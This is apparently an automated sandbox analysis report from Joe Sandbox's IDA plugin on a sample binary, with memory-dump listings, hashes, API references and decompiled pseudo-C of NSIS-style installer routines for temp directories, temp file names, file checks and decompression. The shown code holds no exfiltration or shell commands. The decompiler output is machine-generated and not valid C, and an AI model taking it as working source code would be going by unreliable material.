Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: a3f2ba33ef282063e8bef789480649f163c4345fe71bbebd74fcccbb96bf8ece
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 8DF0F671511119ABCB14BF64ED0DF9B376CAB00305F51447AAA46F10D0EB7CAA69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A38 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A38(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a43
0x00405a47
0x00405a4a
0x00405a50
0x00405a54
0x00405a58
0x00405a60
0x00405a67
0x00405a6d
0x00405a74
0x00405a7b
0x00405a83
0x00405a85
0x00000000
0x00405a85
0x00405a8f
0x00405a96
0x00405aac
0x00000000
0x00000000
0x00000000
0x00405aae
0x00405ab2

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A7B
GetLastError.KERNEL32 ref: 00405A8F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AA4
GetLastError.KERNEL32 ref: 00405AAE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A5E

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-3936084776
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 227e2837d2f0abbefd05ded2a29fab346f6aadb36d837cb996d7b4b6dfe3b4b1
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: A7010C71D00219EEDF009B90D948BEFBBB8EB04314F00413AD945B6181D77896488FE9

Uniqueness

Uniqueness Score: -1.00%

Function 00406026 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406026(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x0040602c
0x00406032
0x00406033
0x00406033
0x00406038
0x00406039
0x0040603c
0x00406041
0x00406044
0x0040604e
0x0040605b
0x0040605f
0x00406067
0x00000000
0x00000000
0x0040606b
0x00000000
0x0040606d
0x0040606d
0x0040606d
0x00406070
0x00406073
0x00406073
0x00406076
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00406044
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,004034F5,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 0040605F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040602B
nsa, xrefs: 00406033

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1857211195
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: f6a7e3e28ef10c8b5a356f390c602f787c019cac788ca5903e6ee53affe9a5d3
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 92F09076B40204BBEB00CF59ED05E9EB7BCEB95750F11803AEA05F7140E6B09D648768

Uniqueness

Uniqueness Score: -1.00%

Function 00405EDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E00405EDE(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406507(0x425f10, _a4);
				_t21 = E00405E81(0x425f10);
				if(_t21 != 0) {
					E0040678E(_t21);
					if(( *0x42a238 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f10 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f10);
							_push(0x425f10);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040683D();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E22(0x425f10);
								continue;
							} else {
								goto L1;
							}
						}
						E00405DD6();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405eea
0x00405ef5
0x00405ef9
0x00405f00
0x00405f0c
0x00405f1c
0x00405f1e
0x00405f36
0x00405f37
0x00405f3e
0x00405f3f
0x00000000
0x00000000
0x00405f22
0x00405f29
0x00405f31
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f29
0x00405f41
0x00405f47
0x00000000
0x00405f55
0x00405f0e
0x00405f14
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f14
0x00405efb
0x00000000

APIs

Part of subcall function 00406507: lstrcpynW.KERNEL32(?,?,00000400,00403667,00429220,NSIS Error), ref: 00406514

Part of subcall function 00405E81: CharNextW.USER32(?,?,00425F10,?,00405EF5,00425F10,00425F10,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405E8F
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405E94
Part of subcall function 00405E81: CharNextW.USER32(00000000), ref: 00405EAC

lstrlenW.KERNEL32(00425F10,00000000,00425F10,00425F10,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F37
GetFileAttributesW.KERNELBASE(00425F10,00425F10,00425F10,00425F10,00425F10,00425F10,00000000,00425F10,00425F10,76F1FAA0,?,C:\Users\user\AppData\Local\Temp\,00405C33,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\), ref: 00405F47

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405EDE

Memory Dump Source

Source File: 00000000.00000002.384256540.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.384150816.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384266178.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384277316.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384287375.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384296720.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384309962.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384319671.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384329384.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384334519.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.384339903.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ypdTgfE0o8.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3936084776
Opcode ID: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction ID: 801aa802fb238c59ad0d4c26bfab73d63669863fdcce98965586ad3d6a32a901
Opcode Fuzzy Hash: 35502845658bd9c497c4a55af97ec41c1cd1fbb9e0c21b6c2721f1846b66cb6f
Instruction Fuzzy Hash: CCF0D135105D6226D622333A9C09AAF1508CF82364B5A053FBCD1B22D1DF3C8A53DDBE

Uniqueness

Uniqueness Score: -1.00%

Function 00407033 Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 99%

			E00407033() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004074A1))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
